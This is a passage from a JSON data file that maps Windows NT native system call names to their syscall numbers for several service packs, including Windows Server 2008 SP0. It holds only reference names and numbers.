"NtQueryFullAttributesFile": 274, "NtQueryInformationAtom": 275, "NtQueryInformationEnlistment": 276, "NtQueryInformationJobObject": 277, "NtQueryInformationPort": 278, "NtQueryInformationResourceManager": 279, "NtQueryInformationTransaction": 280, "NtQueryInformationTransactionManager": 281, "NtQueryInformationWorkerFactory": 282, "NtQueryInstallUILanguage": 283, "NtQueryIntervalProfile": 284, "NtQueryIoCompletion": 285, "NtQueryLicenseValue": 286, "NtQueryMultipleValueKey": 287, "NtQueryMutant": 288, "NtQueryOpenSubKeys": 289, "NtQueryOpenSubKeysEx": 290, "NtQueryPortInformationProcess": 291, "NtQueryQuotaInformationFile": 292, "NtQuerySecurityObject": 293, "NtQuerySemaphore": 294, "NtQuerySymbolicLinkObject": 295, "NtQuerySystemEnvironmentValue": 296, "NtQuerySystemEnvironmentValueEx": 297, "NtQueryTimerResolution": 298, "NtRaiseException": 299, "NtRaiseHardError": 300, "NtReadOnlyEnlistment": 301, "NtRecoverEnlistment": 302, "NtRecoverResourceManager": 303, "NtRecoverTransactionManager": 304, "NtRegisterProtocolAddressInformation": 305, "NtRegisterThreadTerminatePort": 306, "NtReleaseCMFViewOwnership": 307, "NtReleaseKeyedEvent": 308, "NtReleaseWorkerFactoryWorker": 309, "NtRemoveIoCompletionEx": 310, "NtRemoveProcessDebug": 311, "NtRenameKey": 312, "NtReplaceKey": 313, "NtReplyWaitReplyPort": 314, "NtRequestDeviceWakeup": 315, "NtRequestPort": 316, "NtRequestWakeupLatency": 317, "NtResetEvent": 318, "NtResetWriteWatch": 319, "NtRestoreKey": 320, "NtResumeProcess": 321, "NtRollbackComplete": 322, "NtRollbackEnlistment": 323, "NtRollbackSavepointTransaction": 324, "NtRollbackTransaction": 325, "NtRollforwardTransactionManager": 326, "NtSaveKey": 327, "NtSaveKeyEx": 328, "NtSaveMergedKeys": 329, "NtSavepointComplete": 330, "NtSavepointTransaction": 331, "NtSecureConnectPort": 332, "NtSetBootEntryOrder": 333, "NtSetBootOptions": 334, "NtSetContextThread": 335, "NtSetDebugFilterState": 336, "NtSetDefaultHardErrorPort": 337, "NtSetDefaultLocale": 338, "NtSetDefaultUILanguage": 339, "NtSetDriverEntryOrder": 340, "NtSetEaFile": 341, "NtSetHighEventPair": 342, "NtSetHighWaitLowEventPair": 343, "NtSetInformationDebugObject": 344, "NtSetInformationEnlistment": 345, "NtSetInformationJobObject": 346, "NtSetInformationKey": 347, "NtSetInformationResourceManager": 348, "NtSetInformationToken": 349, "NtSetInformationTransaction": 350, "NtSetInformationTransactionManager": 351, "NtSetInformationWorkerFactory": 352, "NtSetIntervalProfile": 353, "NtSetIoCompletion": 354, "NtSetLdtEntries": 355, "NtSetLowEventPair": 356, "NtSetLowWaitHighEventPair": 357, "NtSetQuotaInformationFile": 358, "NtSetSecurityObject": 359, "NtSetSystemEnvironmentValue": 360, "NtSetSystemEnvironmentValueEx": 361, "NtSetSystemInformation": 362, "NtSetSystemPowerState": 363, "NtSetSystemTime": 364, "NtSetThreadExecutionState": 365, "NtSetTimerResolution": 366, "NtSetUuidSeed": 367, "NtSetVolumeInformationFile": 368, "NtShutdownSystem": 369, "NtShutdownWorkerFactory": 370, "NtSignalAndWaitForSingleObject": 371, "NtSinglePhaseReject": 372, "NtStartProfile": 373, "NtStartTm": 374, "NtStopProfile": 375, "NtSuspendProcess": 376, "NtSuspendThread": 377, "NtSystemDebugControl": 378, "NtTerminateJobObject": 379, "NtTestAlert": 380, "NtThawRegistry": 381, "NtThawTransactions": 382, "NtTraceControl": 383, "NtTranslateFilePath": 384, "NtUnloadDriver": 385, "NtUnloadKey": 386, "NtUnloadKey2": 387, "NtUnloadKeyEx": 388, "NtUnlockFile": 389, "NtUnlockVirtualMemory": 390, "NtVdmControl": 391, "NtWaitForDebugEvent": 392, "NtWaitForKeyedEvent": 393, "NtWaitForWorkViaWorkerFactory": 394, "NtWaitHighEventPair": 395, "NtWaitLowEventPair": 396, "NtWorkerFactoryWorkerReady": 397}, "SP1": {"NtMapUserPhysicalPagesScatter": 0, "NtWaitForSingleObject": 1, "NtCallbackReturn": 2, "NtReadFile": 3, "NtDeviceIoControlFile": 4, "NtWriteFile": 5, "NtRemoveIoCompletion": 6, "NtReleaseSemaphore": 7, "NtReplyWaitReceivePort": 8, "NtReplyPort": 9, "NtSetInformationThread": 10, "NtSetEvent": 11, "NtClose": 12, "NtQueryObject": 13, "NtQueryInformationFile": 14, "NtOpenKey": 15, "NtEnumerateValueKey": 16, "NtFindAtom": 17, "NtQueryDefaultLocale": 18, "NtQueryKey": 19, "NtQueryValueKey": 20, "NtAllocateVirtualMemory": 21, "NtQueryInformationProcess": 22, "NtWaitForMultipleObjects32": 23, "NtWriteFileGather": 24, "NtSetInformationProcess": 25, "NtCreateKey": 26, "NtFreeVirtualMemory": 27, "NtImpersonateClientOfPort": 28, "NtReleaseMutant": 29, "NtQueryInformationToken": 30, "NtRequestWaitReplyPort": 31, "NtQueryVirtualMemory": 32, "NtOpenThreadToken": 33, "NtQueryInformationThread": 34, "NtOpenProcess": 35, "NtSetInformationFile": 36, "NtMapViewOfSection": 37, "NtAccessCheckAndAuditAlarm": 38, "NtUnmapViewOfSection": 39, "NtReplyWaitReceivePortEx": 40, "NtTerminateProcess": 41, "NtSetEventBoostPriority": 42, "NtReadFileScatter": 43, "NtOpenThreadTokenEx": 44, "NtOpenProcessTokenEx": 45, "NtQueryPerformanceCounter": 46, "NtEnumerateKey": 47, "NtOpenFile": 48, "NtDelayExecution": 49, "NtQueryDirectoryFile": 50, "NtQuerySystemInformation": 51, "NtOpenSection": 52, "NtQueryTimer": 53, "NtFsControlFile": 54, "NtWriteVirtualMemory": 55, "NtCloseObjectAuditAlarm": 56, "NtDuplicateObject": 57, "NtQueryAttributesFile": 58, "NtClearEvent": 59, "NtReadVirtualMemory": 60, "NtOpenEvent": 61, "NtAdjustPrivilegesToken": 62, "NtDuplicateToken": 63, "NtContinue": 64, "NtQueryDefaultUILanguage": 65, "NtQueueApcThread": 66, "NtYieldExecution": 67, "NtAddAtom": 68, "NtCreateEvent": 69, "NtQueryVolumeInformationFile": 70, "NtCreateSection": 71, "NtFlushBuffersFile": 72, "NtApphelpCacheControl": 73, "NtCreateProcessEx": 74, "NtCreateThread": 75, "NtIsProcessInJob": 76, "NtProtectVirtualMemory": 77, "NtQuerySection": 78, "NtResumeThread": 79, "NtTerminateThread": 80, "NtReadRequestData": 81, "NtCreateFile": 82, "NtQueryEvent": 83, "NtWriteRequestData": 84, "NtOpenDirectoryObject": 85, "NtAccessCheckByTypeAndAuditAlarm": 86, "NtQuerySystemTime": 87, "NtWaitForMultipleObjects": 88, "NtSetInformationObject": 89, "NtCancelIoFile": 90, "NtTraceEvent": 91, "NtPowerInformation": 92, "NtSetValueKey": 93, "NtCancelTimer": 94, "NtSetTimer": 95, "NtAcceptConnectPort": 96, "NtAccessCheck": 97, "NtAccessCheckByType": 98, "NtAccessCheckByTypeResultList": 99, "NtAccessCheckByTypeResultListAndAuditAlarm": 100, "NtAccessCheckByTypeResultListAndAuditAlarmByHandle": 101, "NtAcquireCMFViewOwnership": 102, "NtAddBootEntry": 103, "NtAddDriverEntry": 104, "NtAdjustGroupsToken": 105, "NtAlertResumeThread": 106, "NtAlertThread": 107, "NtAllocateLocallyUniqueId": 108, "NtAllocateUserPhysicalPages": 109, "NtAllocateUuids": 110, "NtAlpcAcceptConnectPort": 111, "NtAlpcCancelMessage": 112, "NtAlpcConnectPort": 113, "NtAlpcCreatePort": 114, "NtAlpcCreatePortSection": 115, "NtAlpcCreateResourceReserve": 116, "NtAlpcCreateSectionView": 117, "NtAlpcCreateSecurityContext": 118, "NtAlpcDeletePortSection": 119, "NtAlpcDeleteResourceReserve": 120, "NtAlpcDeleteSectionView": 121, "NtAlpcDeleteSecurityContext": 122, "NtAlpcDisconnectPort": 123, "NtAlpcImpersonateClientOfPort": 124, "NtAlpcOpenSenderProcess": 125, "NtAlpcOpenSenderThread": 126, "NtAlpcQueryInformation": 127, "NtAlpcQueryInformationMessage": 128, "NtAlpcRevokeSecurityContext": 129, "NtAlpcSendWaitReceivePort": 130, "NtAlpcSetInformation": 131, "NtAreMappedFilesTheSame": 132, "NtAssignProcessToJobObject": 133, "NtCancelDeviceWakeupRequest": 134, "NtCancelIoFileEx": 135, "NtCancelSynchronousIoFile": 136, "NtCommitComplete": 137, "NtCommitEnlistment": 138, "NtCommitTransaction": 139, "NtCompactKeys": 140, "NtCompareTokens": 141, "NtCompleteConnectPort": 142, "NtCompressKey": 143, "NtConnectPort": 144, "NtCreateDebugObject": 145, "NtCreateDirectoryObject": 146, "NtCreateEnlistment": 147, "NtCreateEventPair": 148, "NtCreateIoCompletion": 149, "NtCreateJobObject": 150, "NtCreateJobSet": 151, "NtCreateKeyTransacted": 152, "NtCreateKeyedEvent": 153, "NtCreateMailslotFile": 154, "NtCreateMutant": 155, "NtCreateNamedPipeFile": 156, "NtCreatePagingFile": 157, "NtCreatePort": 158, "NtCreatePrivateNamespace": 159, "NtCreateProcess": 160, "NtCreateProfile": 161, "NtCreateResourceManager": 162, "NtCreateSemaphore": 163, "NtCreateSymbolicLinkObject": 164, "NtCreateThreadEx": 165, "NtCreateTimer": 166, "NtCreateToken": 167, "NtCreateTransaction": 168, "NtCreateTransactionManager": 169, "NtCreateUserProcess": 170, "NtCreateWaitablePort": 171, "NtCreateWorkerFactory": 172, "NtDebugActiveProcess": 173, "NtDebugContinue": 174, "NtDeleteAtom": 175, "NtDeleteBootEntry": 176, "NtDeleteDriverEntry": 177, "NtDeleteFile": 178, "NtDeleteKey": 179, "NtDeleteObjectAuditAlarm": 180, "NtDeletePrivateNamespace": 181, "NtDeleteValueKey": 182, "NtDisplayString": 183, "NtEnumerateBootEntries": 184, "NtEnumerateDriverEntries": 185, "NtEnumerateSystemEnvironmentValuesEx": 186, "NtEnumerateTransactionObject": 187, "NtExtendSection": 188, "NtFilterToken": 189, "NtFlushInstallUILanguage": 190, "NtFlushInstructionCache": 191, "NtFlushKey": 192, "NtFlushProcessWriteBuffers": 193, "NtFlushVirtualMemory": 194, "NtFlushWriteBuffer": 195, "NtFreeUserPhysicalPages": 196, "NtFreezeRegistry": 197, "NtFreezeTransactions": 198, "NtGetContextThread": 199, "NtGetCurrentProcessorNumber": 200, "NtGetDevicePowerState": 201, "NtGetMUIRegistryInfo": 202, "NtGetNextProcess": 203, "NtGetNextThread": 204, "NtGetNlsSectionPtr": 205, "NtGetNotificationResourceManager": 206, "NtGetPlugPlayEvent": 207, "NtGetWriteWatch": 208, "NtImpersonateAnonymousToken": 209, "NtImpersonateThread": 210, "NtInitializeNlsFiles": 211, "NtInitializeRegistry": 212, "NtInitiatePowerAction": 213, "NtIsSystemResumeAutomatic": 214, "NtIsUILanguageComitted": 215, "NtListenPort": 216, "NtLoadDriver": 217, "NtLoadKey": 218, "NtLoadKey2": 219, "NtLoadKeyEx": 220, "NtLockFile": 221, "NtLockProductActivationKeys": 222, "NtLockRegistryKey": 223, "NtLockVirtualMemory": 224, "NtMakePermanentObject": 225, "NtMakeTemporaryObject": 226, "NtMapCMFModule": 227, "NtMapUserPhysicalPages": 228, "NtModifyBootEntry": 229, "NtModifyDriverEntry": 230, "NtNotifyChangeDirectoryFile": 231, "NtNotifyChangeKey": 232, "NtNotifyChangeMultipleKeys": 233, "NtOpenEnlistment": 234, "NtOpenEventPair": 235, "NtOpenIoCompletion": 236, "NtOpenJobObject": 237, "NtOpenKeyTransacted": 238, "NtOpenKeyedEvent": 239, "NtOpenMutant": 240, "NtOpenObjectAuditAlarm": 241, "NtOpenPrivateNamespace": 242, "NtOpenProcessToken": 243, "NtOpenResourceManager": 244, "NtOpenSemaphore": 245, "NtOpenSession": 246, "NtOpenSymbolicLinkObject": 247, "NtOpenThread": 248, "NtOpenTimer": 249, "NtOpenTransaction": 250, "NtOpenTransactionManager": 251, "NtPlugPlayControl": 252, "NtPrePrepareComplete": 253, "NtPrePrepareEnlistment": 254, "NtPrepareComplete": 255, "NtPrepareEnlistment": 256, "NtPrivilegeCheck": 257, "NtPrivilegeObjectAuditAlarm": 258, "NtPrivilegedServiceAuditAlarm": 259, "NtPropagationComplete": 260, "NtPropagationFailed": 261, "NtPulseEvent": 262, "NtQueryBootEntryOrder": 263, "NtQueryBootOptions": 264, "NtQueryDebugFilterState": 265, "NtQueryDirectoryObject": 266, "NtQueryDriverEntryOrder": 267, "NtQueryEaFile": 268, "NtQueryFullAttributesFile": 269, "NtQueryInformationAtom": 270, "NtQueryInformationEnlistment": 271, "NtQueryInformationJobObject": 272, "NtQueryInformationPort": 273, "NtQueryInformationResourceManager": 274, "NtQueryInformationTransaction": 275, "NtQueryInformationTransactionManager": 276, "NtQueryInformationWorkerFactory": 277, "NtQueryInstallUILanguage": 278, "NtQueryIntervalProfile": 279, "NtQueryIoCompletion": 280, "NtQueryLicenseValue": 281, "NtQueryMultipleValueKey": 282, "NtQueryMutant": 283, "NtQueryOpenSubKeys": 284, "NtQueryOpenSubKeysEx": 285, "NtQueryPortInformationProcess": 286, "NtQueryQuotaInformationFile": 287, "NtQuerySecurityObject": 288, "NtQuerySemaphore": 289, "NtQuerySymbolicLinkObject": 290, "NtQuerySystemEnvironmentValue": 291, "NtQuerySystemEnvironmentValueEx": 292, "NtQueryTimerResolution": 293, "NtRaiseException": 294, "NtRaiseHardError": 295, "NtReadOnlyEnlistment": 296, "NtRecoverEnlistment": 297, "NtRecoverResourceManager": 298, "NtRecoverTransactionManager": 299, "NtRegisterProtocolAddressInformation": 300, "NtRegisterThreadTerminatePort": 301, "NtReleaseCMFViewOwnership": 302, "NtReleaseKeyedEvent": 303, "NtReleaseWorkerFactoryWorker": 304, "NtRemoveIoCompletionEx": 305, "NtRemoveProcessDebug": 306, "NtRenameKey": 307, "NtRenameTransactionManager": 308, "NtReplaceKey": 309, "NtReplacePartitionUnit": 310, "NtReplyWaitReplyPort": 311, "NtRequestDeviceWakeup": 312, "NtRequestPort": 313, "NtRequestWakeupLatency": 314, "NtResetEvent": 315, "NtResetWriteWatch": 316, "NtRestoreKey": 317, "NtResumeProcess": 318, "NtRollbackComplete": 319, "NtRollbackEnlistment": 320, "NtRollbackTransaction": 321, "NtRollforwardTransactionManager": 322, "NtSaveKey": 323, "NtSaveKeyEx": 324, "NtSaveMergedKeys": 325, "NtSecureConnectPort": 326, "NtSetBootEntryOrder": 327, "NtSetBootOptions": 328, "NtSetContextThread": 329, "NtSetDebugFilterState": 330, "NtSetDefaultHardErrorPort": 331, "NtSetDefaultLocale": 332, "NtSetDefaultUILanguage": 333, "NtSetDriverEntryOrder": 334, "NtSetEaFile": 335, "NtSetHighEventPair": 336, "NtSetHighWaitLowEventPair": 337, "NtSetInformationDebugObject": 338, "NtSetInformationEnlistment": 339, "NtSetInformationJobObject": 340, "NtSetInformationKey": 341, "NtSetInformationResourceManager": 342, "NtSetInformationToken": 343, "NtSetInformationTransaction": 344, "NtSetInformationTransactionManager": 345, "NtSetInformationWorkerFactory": 346, "NtSetIntervalProfile": 347, "NtSetIoCompletion": 348, "NtSetLdtEntries": 349, "NtSetLowEventPair": 350, "NtSetLowWaitHighEventPair": 351, "NtSetQuotaInformationFile": 352, "NtSetSecurityObject": 353, "NtSetSystemEnvironmentValue": 354, "NtSetSystemEnvironmentValueEx": 355, "NtSetSystemInformation": 356, "NtSetSystemPowerState": 357, "NtSetSystemTime": 358, "NtSetThreadExecutionState": 359, "NtSetTimerResolution": 360, "NtSetUuidSeed": 361, "NtSetVolumeInformationFile": 362, "NtShutdownSystem": 363, "NtShutdownWorkerFactory": 364, "NtSignalAndWaitForSingleObject": 365, "NtSinglePhaseReject": 366, "NtStartProfile": 367, "NtStopProfile": 368, "NtSuspendProcess": 369, "NtSuspendThread": 370, "NtSystemDebugControl": 371, "NtTerminateJobObject": 372, "NtTestAlert": 373, "NtThawRegistry": 374, "NtThawTransactions": 375, "NtTraceControl": 376, "NtTranslateFilePath": 377, "NtUnloadDriver": 378, "NtUnloadKey": 379, "NtUnloadKey2": 380, "NtUnloadKeyEx": 381, "NtUnlockFile": 382, "NtUnlockVirtualMemory": 383, "NtVdmControl": 384, "NtWaitForDebugEvent": 385, "NtWaitForKeyedEvent": 386, "NtWaitForWorkViaWorkerFactory": 387, "NtWaitHighEventPair": 388, "NtWaitLowEventPair": 389, "NtWorkerFactoryWorkerReady": 390}, "SP2": {"NtMapUserPhysicalPagesScatter": 0, "NtWaitForSingleObject": 1, "NtCallbackReturn": 2, "NtReadFile": 3, "NtDeviceIoControlFile": 4, "NtWriteFile": 5, "NtRemoveIoCompletion": 6, "NtReleaseSemaphore": 7, "NtReplyWaitReceivePort": 8, "NtReplyPort": 9, "NtSetInformationThread": 10, "NtSetEvent": 11, "NtClose": 12, "NtQueryObject": 13, "NtQueryInformationFile": 14, "NtOpenKey": 15, "NtEnumerateValueKey": 16, "NtFindAtom": 17, "NtQueryDefaultLocale": 18, "NtQueryKey": 19, "NtQueryValueKey": 20, "NtAllocateVirtualMemory": 21, "NtQueryInformationProcess": 22, "NtWaitForMultipleObjects32": 23, "NtWriteFileGather": 24, "NtSetInformationProcess": 25, "NtCreateKey": 26, "NtFreeVirtualMemory": 27, "NtImpersonateClientOfPort": 28, "NtReleaseMutant": 29, "NtQueryInformationToken": 30, "NtRequestWaitReplyPort": 31, "NtQueryVirtualMemory": 32, "NtOpenThreadToken": 33, "NtQueryInformationThread": 34, "NtOpenProcess": 35, "NtSetInformationFile": 36, "NtMapViewOfSection": 37, "NtAccessCheckAndAuditAlarm": 38, "NtUnmapViewOfSection": 39, "NtReplyWaitReceivePortEx": 40, "NtTerminateProcess": 41, "NtSetEventBoostPriority": 42, "NtReadFileScatter": 43, "NtOpenThreadTokenEx": 44, "NtOpenProcessTokenEx": 45, "NtQueryPerformanceCounter": 46, "NtEnumerateKey": 47, "NtOpenFile": 48, "NtDelayExecution": 49, "NtQueryDirectoryFile": 50, "NtQuerySystemInformation": 51, "NtOpenSection": 52, "NtQueryTimer": 53, "NtFsControlFile": 54, "NtWriteVirtualMemory": 55, "NtCloseObjectAuditAlarm": 56, "NtDuplicateObject": 57, "NtQueryAttributesFile": 58, "NtClearEvent": 59, "NtReadVirtualMemory": 60, "NtOpenEvent": 61, "NtAdjustPrivilegesToken": 62, "NtDuplicateToken": 63, "NtContinue": 64, "NtQueryDefaultUILanguage": 65, "NtQueueApcThread": 66, "NtYieldExecution": 67, "NtAddAtom": 68, "NtCreateEvent": 69, "NtQueryVolumeInformationFile": 70, "NtCreateSection": 71, "NtFlushBuffersFile": 72, "NtApphelpCacheControl": 73, "NtCreateProcessEx": 74, "NtCreateThread": 75, "NtIsProcessInJob": 76, "NtProtectVirtualMemory": 77, "NtQuerySection": 78, "NtResumeThread": 79, "NtTerminateThread": 80, "NtReadRequestData": 81, "NtCreateFile": 82, "NtQueryEvent": 83, "NtWriteRequestData": 84, "NtOpenDirectoryObject": 85, "NtAccessCheckByTypeAndAuditAlarm": 86, "NtQuerySystemTime": 87, "NtWaitForMultipleObjects": 88, "NtSetInformationObject": 89, "NtCancelIoFile": 90, "NtTraceEvent": 91, "NtPowerInformation": 92, "NtSetValueKey": 93, "NtCancelTimer": 94, "NtSetTimer": 95, "NtAcceptConnectPort": 96, "NtAccessCheck": 97, "NtAccessCheckByType": 98, "NtAccessCheckByTypeResultList": 99, "NtAccessCheckByTypeResultListAndAuditAlarm": 100, "NtAccessCheckByTypeResultListAndAuditAlarmByHandle": 101, "NtAcquireCMFViewOwnership": 102, "NtAddBootEntry": 103, "NtAddDriverEntry": 104, "NtAdjustGroupsToken": 105, "NtAlertResumeThread": 106, "NtAlertThread": 107, "NtAllocateLocallyUniqueId": 108, "NtAllocateUserPhysicalPages": 109, "NtAllocateUuids": 110, "NtAlpcAcceptConnectPort": 111, "NtAlpcCancelMessage": 112, "NtAlpcConnectPort": 113, "NtAlpcCreatePort": 114, "NtAlpcCreatePortSection": 115, "NtAlpcCreateResourceReserve": 116, "NtAlpcCreateSectionView": 117, "NtAlpcCreateSecurityContext": 118, "NtAlpcDeletePortSection": 119, "NtAlpcDeleteResourceReserve": 120, "NtAlpcDeleteSectionView": 121, "NtAlpcDeleteSecurityContext": 122, "NtAlpcDisconnectPort": 123, "NtAlpcImpersonateClientOfPort": 124, "NtAlpcOpenSenderProcess": 125, "NtAlpcOpenSenderThread": 126, "NtAlpcQueryInformation": 127, "NtAlpcQueryInformationMessage": 128, "NtAlpcRevokeSecurityContext": 129, "NtAlpcSendWaitReceivePort": 130, "NtAlpcSetInformation": 131, "NtAreMappedFilesTheSame": 132, "NtAssignProcessToJobObject": 133, "NtCancelDeviceWakeupRequest": 134, "NtCancelIoFileEx": 135, "NtCancelSynchronousIoFile": 136, "NtCommitComplete": 137, "NtCommitEnlistment": 138, "NtCommitTransaction": 139, "NtCompactKeys": 140, "NtCompareTokens": 141, "NtCompleteConnectPort": 142, "NtCompressKey": 143, "NtConnectPort": 144, "NtCreateDebugObject": 145, "NtCreateDirectoryObject": 146, "NtCreateEnlistment": 147, "NtCreateEventPair": 148, "NtCreateIoCompletion": 149, "NtCreateJobObject": 150, "NtCreateJobSet": 151, "NtCreateKeyTransacted": 152, "NtCreateKeyedEvent": 153, "NtCreateMailslotFile": 154, "NtCreateMutant": 155, "NtCreateNamedPipeFile": 156, "NtCreatePagingFile": 157, "NtCreatePort": 158, "NtCreatePrivateNamespace": 159, "NtCreateProcess": 160, "NtCreateProfile": 161, "NtCreateResourceManager": 162, "NtCreateSemaphore": 163, "NtCreateSymbolicLinkObject": 164, "NtCreateThreadEx": 165, "NtCreateTimer": 166, "NtCreateToken": 167, "NtCreateTransaction": 168, "NtCreateTransactionManager": 169, "NtCreateUserProcess": 170, "NtCreateWaitablePort": 171, "NtCreateWorkerFactory": 172, "NtDebugActiveProcess": 173, "NtDebugContinue": 174, "NtDeleteAtom": 175, "NtDeleteBootEntry": 176, "NtDeleteDriverEntry": 177, "NtDeleteFile": 178, "NtDeleteKey": 179, "NtDeleteObjectAuditAlarm": 180, "NtDeletePrivateNamespace": 181, "NtDeleteValueKey": 182, "NtDisplayString": 183, "NtEnumerateBootEntries": 184, "NtEnumerateDriverEntries": 185, "NtEnumerateSystemEnvironmentValuesEx": 186, "NtEnumerateTransactionObject": 187, "NtExtendSection": 188, "NtFilterToken": 189, "NtFlushInstallUILanguage": 190, "NtFlushInstructionCache": 191, "NtFlushKey": 192, "NtFlushProcessWriteBuffers": 193, "NtFlushVirtualMemory": 194, "NtFlushWriteBuffer": 195, "NtFreeUserPhysicalPages": 196, "NtFreezeRegistry": 197, "NtFreezeTransactions": 198, "NtGetContextThread": 199, "NtGetCurrentProcessorNumber": 200, "NtGetDevicePowerState": 201, "NtGetMUIRegistryInfo": 202, "NtGetNextProcess": 203, "NtGetNextThread": 204, "NtGetNlsSectionPtr": 205, "NtGetNotificationResourceManager": 206, "NtGetPlugPlayEvent": 207, "NtGetWriteWatch": 208, "NtImpersonateAnonymousToken": 209, "NtImpersonateThread": 210, "NtInitializeNlsFiles": 211, "NtInitializeRegistry": 212, "NtInitiatePowerAction": 213, "NtIsSystemResumeAutomatic": 214, "NtIsUILanguageComitted": 215, "NtListenPort": 216, "NtLoadDriver": 217, "NtLoadKey": 218, "NtLoadKey2": 219, "NtLoadKeyEx": 220, "NtLockFile": 221, "NtLockProductActivationKeys": 222, "NtLockRegistryKey": 223, "NtLockVirtualMemory": 224, "NtMakePermanentObject": 225, "NtMakeTemporaryObject": 226, "NtMapCMFModule": 227, "NtMapUserPhysicalPages": 228, "NtModifyBootEntry": 229, "NtModifyDriverEntry": 230, "NtNotifyChangeDirectoryFile": 231, "NtNotifyChangeKey": 232, "NtNotifyChangeMultipleKeys": 233, "NtOpenEnlistment": 234, "NtOpenEventPair": 235, "NtOpenIoCompletion": 236, "NtOpenJobObject": 237, "NtOpenKeyTransacted": 238, "NtOpenKeyedEvent": 239, "NtOpenMutant": 240, "NtOpenObjectAuditAlarm": 241, "NtOpenPrivateNamespace": 242, "NtOpenProcessToken": 243, "NtOpenResourceManager": 244, "NtOpenSemaphore": 245, "NtOpenSession": 246, "NtOpenSymbolicLinkObject": 247, "NtOpenThread": 248, "NtOpenTimer": 249, "NtOpenTransaction": 250, "NtOpenTransactionManager": 251, "NtPlugPlayControl": 252, "NtPrePrepareComplete": 253, "NtPrePrepareEnlistment": 254, "NtPrepareComplete": 255, "NtPrepareEnlistment": 256, "NtPrivilegeCheck": 257, "NtPrivilegeObjectAuditAlarm": 258, "NtPrivilegedServiceAuditAlarm": 259, "NtPropagationComplete": 260, "NtPropagationFailed": 261, "NtPulseEvent": 262, "NtQueryBootEntryOrder": 263, "NtQueryBootOptions": 264, "NtQueryDebugFilterState": 265, "NtQueryDirectoryObject": 266, "NtQueryDriverEntryOrder": 267, "NtQueryEaFile": 268, "NtQueryFullAttributesFile": 269, "NtQueryInformationAtom": 270, "NtQueryInformationEnlistment": 271, "NtQueryInformationJobObject": 272, "NtQueryInformationPort": 273, "NtQueryInformationResourceManager": 274, "NtQueryInformationTransaction": 275, "NtQueryInformationTransactionManager": 276, "NtQueryInformationWorkerFactory": 277, "NtQueryInstallUILanguage": 278, "NtQueryIntervalProfile": 279, "NtQueryIoCompletion": 280, "NtQueryLicenseValue": 281, "NtQueryMultipleValueKey": 282, "NtQueryMutant": 283, "NtQueryOpenSubKeys": 284, "NtQueryOpenSubKeysEx": 285, "NtQueryPortInformationProcess": 286, "NtQueryQuotaInformationFile": 287, "NtQuerySecurityObject": 288, "NtQuerySemaphore": 289, "NtQuerySymbolicLinkObject": 290, "NtQuerySystemEnvironmentValue": 291, "NtQuerySystemEnvironmentValueEx": 292, "NtQueryTimerResolution": 293, "NtRaiseException": 294, "NtRaiseHardError": 295, "NtReadOnlyEnlistment": 296, "NtRecoverEnlistment": 297, "NtRecoverResourceManager": 298, "NtRecoverTransactionManager": 299, "NtRegisterProtocolAddressInformation": 300, "NtRegisterThreadTerminatePort": 301, "NtReleaseCMFViewOwnership": 302, "NtReleaseKeyedEvent": 303, "NtReleaseWorkerFactoryWorker": 304, "NtRemoveIoCompletionEx": 305, "NtRemoveProcessDebug": 306, "NtRenameKey": 307, "NtRenameTransactionManager": 308, "NtReplaceKey": 309, "NtReplacePartitionUnit": 310, "NtReplyWaitReplyPort": 311, "NtRequestDeviceWakeup": 312, "NtRequestPort": 313, "NtRequestWakeupLatency": 314, "NtResetEvent": 315, "NtResetWriteWatch": 316, "NtRestoreKey": 317, "NtResumeProcess": 318, "NtRollbackComplete": 319, "NtRollbackEnlistment": 320, "NtRollbackTransaction": 321, "NtRollforwardTransactionManager": 322, "NtSaveKey": 323, "NtSaveKeyEx": 324, "NtSaveMergedKeys": 325, "NtSecureConnectPort": 326, "NtSetBootEntryOrder": 327, "NtSetBootOptions": 328, "NtSetContextThread": 329, "NtSetDebugFilterState": 330, "NtSetDefaultHardErrorPort": 331, "NtSetDefaultLocale": 332, "NtSetDefaultUILanguage": 333, "NtSetDriverEntryOrder": 334, "NtSetEaFile": 335, "NtSetHighEventPair": 336, "NtSetHighWaitLowEventPair": 337, "NtSetInformationDebugObject": 338, "NtSetInformationEnlistment": 339, "NtSetInformationJobObject": 340, "NtSetInformationKey": 341, "NtSetInformationResourceManager": 342, "NtSetInformationToken": 343, "NtSetInformationTransaction": 344, "NtSetInformationTransactionManager": 345, "NtSetInformationWorkerFactory": 346, "NtSetIntervalProfile": 347, "NtSetIoCompletion": 348, "NtSetLdtEntries": 349, "NtSetLowEventPair": 350, "NtSetLowWaitHighEventPair": 351, "NtSetQuotaInformationFile": 352, "NtSetSecurityObject": 353, "NtSetSystemEnvironmentValue": 354, "NtSetSystemEnvironmentValueEx": 355, "NtSetSystemInformation": 356, "NtSetSystemPowerState": 357, "NtSetSystemTime": 358, "NtSetThreadExecutionState": 359, "NtSetTimerResolution": 360, "NtSetUuidSeed": 361, "NtSetVolumeInformationFile": 362, "NtShutdownSystem": 363, "NtShutdownWorkerFactory": 364, "NtSignalAndWaitForSingleObject": 365, "NtSinglePhaseReject": 366, "NtStartProfile": 367, "NtStopProfile": 368, "NtSuspendProcess": 369, "NtSuspendThread": 370, "NtSystemDebugControl": 371, "NtTerminateJobObject": 372, "NtTestAlert": 373, "NtThawRegistry": 374, "NtThawTransactions": 375, "NtTraceControl": 376, "NtTranslateFilePath": 377, "NtUnloadDriver": 378, "NtUnloadKey": 379, "NtUnloadKey2": 380, "NtUnloadKeyEx": 381, "NtUnlockFile": 382, "NtUnlockVirtualMemory": 383, "NtVdmControl": 384, "NtWaitForDebugEvent": 385, "NtWaitForKeyedEvent": 386, "NtWaitForWorkViaWorkerFactory": 387, "NtWaitHighEventPair": 388, "NtWaitLowEventPair": 389, "NtWorkerFactoryWorkerReady": 390}}, "Windows Server 2008": {"SP0": {"NtMapUserPhysicalPagesScatter": 0, "NtWaitForSingleObject": 1, "NtCallbackReturn": 2, "NtReadFile": 3, "NtDeviceIoControlFile": 4, "NtWriteFile": 5, "NtRemoveIoCompletion": 6, "NtReleaseSemaphore": 7, "NtReplyWaitReceivePort": 8, "NtReplyPort": 9, "NtSetInformationThread": 10, "NtSetEvent": 11, "NtClose": 12, "NtQueryObject": 13, "NtQueryInformationFile": 14, "NtOpenKey": 15, "NtEnumerateValueKey": 16, "NtFindAtom": 17, "NtQueryDefaultLocale": 18, "NtQueryKey": 19, "NtQueryValueKey": 20, "NtAllocateVirtualMemory": 21, "NtQueryInformationProcess": 22, "NtWaitForMultipleObjects32": 23, "NtWriteFileGather": 24, "NtSetInformationProcess": 25, "NtCreateKey": 26, "NtFreeVirtualMemory": 27, "NtImpersonateClientOfPort": 28, 